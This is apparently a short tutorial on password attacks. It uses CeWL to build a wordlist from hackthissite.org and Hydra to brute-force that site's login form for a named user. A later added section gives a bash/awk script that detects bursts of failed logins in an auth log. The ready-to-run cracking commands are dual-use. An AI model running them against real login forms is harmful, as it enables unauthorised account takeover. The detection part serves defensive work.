Automated Password Testing with CeWL and Hydra
This guide describes how to use CeWL and Hydra to generate a wordlist from a website and brute-force a
login form.
Step 1: Crawl Website with CeWL
-------------------------------
Use CeWL to scrape words from a target site and build a password list:
cewl -d 2 -w cewl_wordlist.txt https://www.hackthissite.org
This creates a wordlist named 'cewl_wordlist.txt' from the website.
Step 2: Clean the Wordlist
--------------------------
To remove short and duplicate words, run:
cat cewl_wordlist.txt | sort | uniq | grep -E '.{8,}' > cleaned_wordlist.txt
Step 3: Brute-Force Login with Hydra
------------------------------------
With a known username, use Hydra like this:
hydra -l stensly -P cleaned_wordlist.txt hackthissite.org http-post-form "/user/login:username=^USER^&password=^PASS^:F=invalid password"
This command will attempt each password against the login form and stop on success.
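For the team defending the login form, the run in Step 3 shows up as a burst of failed logins for one username from one source, possibly ending in a success. The following is an added example, not part of the original guide or its ZIP file, that flags that pattern in an application auth log. The log format, the event names, the helper names and the threshold and window values are assumptions, and the sample lines are constructed.

```bash
#!/usr/bin/env bash
# Constructed sample auth log (hypothetical format): <epoch> <event> user=<name> src=<ip>
sample_log() {
  cat <<'EOF'
1714557600 login_failed user=alice src=198.51.100.20
1714557601 login_failed user=stensly src=203.0.113.7
1714557602 login_failed user=stensly src=203.0.113.7
1714557603 login_failed user=stensly src=203.0.113.7
1714557604 login_failed user=stensly src=203.0.113.7
1714557605 login_failed user=stensly src=203.0.113.7
1714557606 login_ok user=stensly src=203.0.113.7
1714557900 login_ok user=alice src=198.51.100.20
EOF
}

# detect_guessing THRESHOLD WINDOW_SECONDS  (reads the log on stdin)
# Flags a (source, user) pair once THRESHOLD failures fall inside a sliding
# window, and reports any later successful login for a flagged pair.
detect_guessing() {
  awk -v threshold="$1" -v window="$2" '
    {
      ts = $1; event = $2
      user = $3; sub(/^user=/, "", user)
      src = $4;  sub(/^src=/, "", src)
      key = src " " user
    }
    event == "login_failed" {
      tail[key]++
      times[key, tail[key]] = ts
      if (!(key in head)) head[key] = 1
      # Drop failures that have aged out of the window.
      while (ts - times[key, head[key]] > window) {
        delete times[key, head[key]]
        head[key]++
      }
      n = tail[key] - head[key] + 1
      if (n >= threshold && !(key in flagged)) {
        flagged[key] = 1
        print "GUESSING " key " failures=" n
      }
    }
    # A success after flagged guessing means the password was likely found.
    event == "login_ok" && (key in flagged) { print "SUCCESS_AFTER_GUESSING " key }
  '
}

sample_log | detect_guessing 5 60
```

A SUCCESS_AFTER_GUESSING line is the one to escalate: treat the account as compromised and reset its password.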
Automated Script
----------------
To automate the process, run the bash script included in the provided ZIP file:
./cewl_hydra_auto.sh
Ensure all tools (cewl, hydra) are installed and accessible in PATH.